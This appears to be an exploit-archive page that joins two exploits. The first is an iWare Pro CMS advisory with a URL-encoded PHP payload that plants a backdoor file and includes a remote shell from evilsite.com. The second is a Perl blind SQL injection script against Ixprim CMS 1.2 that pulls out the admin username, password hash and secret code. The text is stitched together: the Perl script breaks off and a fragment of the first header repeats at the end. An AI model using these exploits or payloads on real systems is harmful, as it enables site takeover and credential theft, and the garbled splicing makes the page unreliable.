+ + iWare Pro <= 5.0.4 (chat_panel.php) Remote Code Execution Vulnerability + + Affected Software .: iWare Professional CMS <= 5.0.4 + Vendor : http://www.dsiware.com/ + Download : http://dsiware.com/download.php + Description : "iWare is a Open Source PHP & MySQL Content Management System" + Class : Remote Code Execution + Risk : High (Remote Code Execution) + Found By : nuffsaid <nuffsaid[at]newbslove.us> + + Details: + iWare admin/mods/simplechat_1.0.0/chat_panel.php does not sanatize the $message variable + in the first argument of the PostMessage() function on line 11 before writing the variable + contents to chat_log.php on line 25. When chat_panel.php is requested, the PostMessage() + function is called on line 32 and $_REQUEST['msg'] is written to chat_log.php unsanatized. + + Vulnerable Code: + admin/mods/simplechat_1.0.0/chat_panel.php, line(s) 11-32: + -> 11: function PostMessage($message) { + -> 16: $new_message = "".$message."<br />\n"; + -> 23: $open_file = fopen("chat_log.php", "w"); + -> 25: fputs($open_file, stripslashes($new_message)); + -> 28: fclose($open_file); + -> 29: } + -> 32: if($_REQUEST['talk']==1){PostMessage($_REQUEST['msg']);} + + Proof Of Concept: + http://[target]/[path]/admin/mods/simplechat_1.0.0/chat_panel.php?talk=1&msg=[ evilcode] + http://[target]/[path]/admin/mods/simplechat_1.0.0/chat_log.php + -> http://[target]/[path]/admin/mods/simplechat_1.0.0/chat_panel.php?talk=1&msg= %3C%3Fphp%0D%0A%24open_file+%3D+fopen%28%22 %2F %2F %2Fevilf ile.php%22%2C+%22w%22%29%3B%0D%0Afputs%28%24open_file%2C%22 %3C%3Fphp+include%28%5C%24_GET%5B%27evil_include%27%5D%29%3 B+%3F%3E%22%29%3B%0D%0Afclose%28%24open_file%29%3B%0D%0Ac hmod%28%22 %2F %2F %2Fevilfile.php%22%2C0777%29%3B%0D%0A%3F %3E + -> http://[target]/[path]/admin/mods/simplechat_1.0.0/chat_log.php + -> http://[target]/[path]/evilfile.php?evil_include=http://evilsite.com/shell.php + Black_hat_cr(HCE) Ixprim CMS 1.2 Remote Blind SQL Injection Exploit Code: #!/usr/bin/perl # # INFORMATIONS # ============ # Affected.scr : Ixprim 1.2 # Poc.ID : 16061221 # Type : Blind SQL Injection # Risk.level : Medium # Conditions : load_file privilege (ixp code only) # Src.download : www.ixprim-cms.org # Poc.link : acid-root.new.fr/poc/16061221.txt # Credits : DarkFig # # # SCREENSHOT # ========== # header> Ixprim 1.2 Remote Blind SQL Injection Exploit # header> ============================================= # status> Searching if someone posted a comment # sploit> story_id=2 # status> Searching the administrator's uid # sploit> 1 # status> Searching the administrator's username length # sploit> 4 # status> Searching the administrator's username # sploit> root # status> Searching the adminitrator's password hash # sploit> 7b24afc8bc80e548d66c4e7ff72171c5 # status> Searching a full path disclosure # sploit> /home/www/ixprim-1.2/html/mainfile.php # status> Searching the confidential ixp code # sploit> c998aa6188034690aab6565c0099fe0a # use HTTP::Request::Common; use LWP::UserAgent; use HTTP::Response; use Getopt::Long; print STDOUT "\n header> Ixprim 1.2 Remote Blind SQL Injection Exploit"; print STDOUT "\n header> =============================================\n"; my $opt = GetOptions( 'host=s' => \$host, 'path=s' => \$path, 'proxh=s' => \$proxh, 'proxu=s' => \$proxu, 'proxp=s' => \$proxp); if(!$host) { print STDOUT " header> Usage : xpl.pl -host [host] -path [path]\n"; print STDOUT " header> Options: -proxh [host] -proxu [user] -proxp [pass]\n"; exit(1); } $host = $host !~ /^http:\/\// ? "http://$host" : $host; $path = defined($path) ? $path : "/"; my $ua = LWP::UserAgent->new(); $ua->agent('r00xzilla'); $ua->timeout(30); $ua->proxy('[http]' => $proxh) if $proxh; my $req = HTTP::Request->new(GET => $host.$path.'ixm_ixpnews.php'); $req->proxy_authorization_basic($proxu,$proxp) if $proxu; $res = ($ua->request($req))->content; print STDOUT " status> Searching if someone posted a comment\n"; # There is more than one sql injection, but this one is the most # interesting to exploit. The parameter 'story_id' isn't properly # sanitised before being used in an SQL query. URL Rewriting option # supported. # if($res =~ /(story_id=||news-art)([0-9]+)(||.html)">([0-9]+) (commentaire||comment)/) { $story_id = $2; $bsql = $host.$path."ixm_ixpnews.php?file=article&story_id=$story_id"; print STDOUT " sploit> story_id=$story_id\n";} else { print STDOUT " status> No comment posted\n\n"; exit(1); } print STDOUT " status> Searching the administrator's uid\n"; $uid = sendreq(1,1,"select%20uid%20from%20ixp_users%20order%20by%20uid%20lim it%200,1"); print STDOUT " status> Searching the administrator's username length\n"; $admlg = sendreq(1,3,"length((select%20uname%20from%20ixp_users%20where%20uid=$ uid))"); print STDOUT " status> Searching the administrator's username\n"; &sendreq(1,$admlg,"select%20uname%20from%20ixp_users%20where%20uid=$ uid"); print STDOUT " status> Searching the adminitrator's password hash\n"; &sendreq(1,32,"select%20pass%20from%20ixp_users%20where%20uid=$uid"); print STDOUT " status> Searching a full path disclosure"; $req = GET $host.$path.'kernel/plugins/fckeditor2/ixprim_api.php'; $res = ($ua->request($req))->content; if($res =~ /in <b>(.*?)kernel(\/||\\)/) { $fpd = $1.'mainfile.php'; print STDOUT "\n sploit> $fpd\n";} else { print STDOUT "\n status> Can't get the full path disclosure"; exit(1); } # A personal code who is stored in mainfile.php protect the administration panel # # // Code personnel CMS # define("IXP_CODE", 'c998aa6188034690aab6565c0099fe0a'); # # This code is generated by the function code() stored in install.fct.php # # function code($param='1') # { # $number = rand(1,1024); # $temp = md5(($number*time()).$param); # $temp = substr($temp, 0, 8); # return $temp; # } # # $param = $host.$path and $temp can be modified by the user. # After the request sent, the script create the sql tables and the time() # when it created them is stored in the mysql database, we can retrieve it with the sql # injection and IF the user don't modified the generated code, we can find the personal code. # The time during the creation of the table and the generation of the code # is not the same, but we can try to bruteforce it with some parameters. # But the user can change the generated code that's why i decided to use the sql # injection with load_file and regexp. # print STDOUT " status> Searching the confidential ixp code\n"; # Example with "C:/Program Files/EasyPHP1-8/www/ixprim- 1.2/html/mainfile.php" . <= 5.0.4 (chat_panel.php) Remote Code Execution Vulnerability + + Affected Software .: iWare Professional CMS <= 5.0.4 + Vendor : http://www.dsiware.com/ + Download : http://dsiware.com/download.php